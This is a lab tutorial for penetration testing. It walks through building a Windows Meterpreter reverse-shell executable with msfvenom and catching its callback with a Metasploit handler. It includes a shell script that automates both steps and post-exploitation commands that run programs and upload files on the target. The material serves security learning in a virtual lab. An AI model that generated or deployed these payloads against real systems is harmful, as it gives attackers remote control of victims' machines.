
Creating a simple payload with msfvenom


To get a Meterpreter session between Metasploit and your target machine you first need a payload: an executable that carries the Meterpreter stager and, when run on the target, connects back to your machine so that you can control it. Creating the payload is easy with msfvenom. The hard parts are getting the file onto the target and executed (usually through social engineering) and getting it past the antivirus products that are commonly deployed; an unmodified msfvenom executable like the one built here is reliably flagged by Windows Defender and most other scanners.

In this exercise we turn off the Windows Defender antivirus on a Windows 10 VM so that the unmodified payload can run, and then set up a connection between our machine and that target in our virtual lab. Both machines are on the same lab network; the attacking (Kali) machine has the address 10.0.2.4.

We will use the staged windows/meterpreter/reverse_tcp payload, which makes the target connect back to us (so only an outbound connection from the target has to be allowed). LHOST and LPORT are the address and port the target will connect back to, so they must be your attacking machine's address and a port you can listen on. Open a terminal and run:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.4 LPORT=1234 -f exe -o win10.exe

-f exe produces a Windows PE executable and -o writes it to the named file (redirecting standard output with > win10.exe works as well). This payload is 32-bit; it still runs on 64-bit Windows 10, and windows/x64/meterpreter/reverse_tcp is the native 64-bit equivalent.

The file win10.exe is written to the current working directory on your Linux machine.

You now need a way to get this file onto the target system and executed. There are various ways to do this, and more advanced methods of disguising the file, but they are outside the scope of this tutorial. Assume from here on that the file is on the target Windows machine and ready to be run.

Before it is run, our machine must be listening for the connection, otherwise the payload's callback fails and the target simply exits.

Open a terminal and start Metasploit with msfconsole:

$ msfconsole

Now we set up Metasploit to listen for the incoming connection. The handler must use exactly the same payload, LHOST and LPORT as the msfvenom command; otherwise the stager either never reaches us or is sent the wrong second stage, and no session is opened.

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.0.2.4

msf6 exploit(multi/handler) > set LPORT 1234

msf6 exploit(multi/handler) > exploit

Leave the handler running. Once win10.exe is executed on the target, the handler reports that a Meterpreter session has been opened and drops you at the meterpreter > prompt.
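The two steps above have to agree on payload, LHOST and LPORT, and typing them twice by hand is the usual way they drift apart. The script below is an added example (not from the original tutorial) that generates the msfvenom command and a matching msfconsole resource file from one set of values, checks that the host and port are usable, and only invokes msfvenom and msfconsole when run with the argument "run". The file names build.sh and handler.rc and the lab values 10.0.2.4 and 1234 are assumptions taken from this page.

```shell
#!/usr/bin/env bash
# Added example, not part of the original tutorial.
# One set of values feeds both the msfvenom command and the multi/handler
# resource file, so payload type, LHOST and LPORT cannot disagree.
set -eu

# Assumed lab values, taken from the tutorial: attacker at 10.0.2.4, port 1234.
# Override with environment variables, e.g.  LPORT=4444 ./build.sh run
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-10.0.2.4}"
LPORT="${LPORT:-1234}"
OUT="${OUT:-win10.exe}"
RC="${RC:-handler.rc}"

# Reject values that produce a payload which can never call back:
# an empty or oddly formed host, or a port outside 1..65535.
validate_params() {
  local host="$1" port="$2"
  case "$host" in
    ""|*[!A-Za-z0-9.-]*) return 1 ;;
  esac
  case "$port" in
    ""|*[!0-9]*) return 1 ;;
  esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ]
}

# The msfvenom command line, equivalent to the tutorial's command
# (-o instead of a shell redirect, so nothing but the PE lands in the file).
venom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s' "$1" "$2" "$3" "$4"
}

# A msfconsole resource file mirroring the interactive handler setup.
# ExitOnSession false plus exploit -j keeps the handler listening in the
# background, so a re-run payload or a second target can also connect.
handler_rc() {
  printf 'use exploit/multi/handler\n'
  printf 'set payload %s\n' "$1"
  printf 'set LHOST %s\n' "$2"
  printf 'set LPORT %s\n' "$3"
  printf 'set ExitOnSession false\n'
  printf 'exploit -j -z\n'
}

# Only build and start listening when asked to, so the file can be sourced
# for its functions without touching msfvenom or msfconsole.
if [ "${1:-}" = "run" ]; then
  validate_params "$LHOST" "$LPORT" || { echo "bad LHOST/LPORT: $LHOST:$LPORT" >&2; exit 1; }
  eval "$(venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" "$OUT")"
  handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > "$RC"
  echo "payload written to $OUT, handler commands in $RC" >&2
  exec msfconsole -q -r "$RC"
fi
```

Running ./build.sh run writes win10.exe and handler.rc and then starts msfconsole with the handler already listening as a background job; a session that opens shows up under sessions -l and is entered with sessions -i 1.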

We are now connected to the target machine and can start to do some interesting things. First, let us find out about the machine we are connected to with the sysinfo command:

meterpreter > sysinfo

The getuid command shows the account the Meterpreter process is running as, which is the user who launched the payload (not necessarily an administrator; everything we do from here runs with that user's rights):

meterpreter > getuid

We can list the running processes with the ps command:

meterpreter > ps

We can also execute a program on the target. For example, we can start Notepad remotely with:

meterpreter > execute -f notepad.exe

Notepad opens on the target's desktop: the payload was started from the logged-in user's interactive session, and processes started with execute inherit it.

Finally, we will upload a file to the target machine. On our machine we have a text file named "you_have_been_hacked.txt" in the directory /home/kali. The upload command copies it into the directory we are currently in on the target. When the session opens, that is the working directory of the process that ran the payload, normally the directory the .exe was started from. You can change directory with cd <directory>; in our case we have navigated to the Desktop directory of the user on the target machine. pwd shows where you are, and dir (an alias of ls) lists the contents of the current directory:

meterpreter > dir

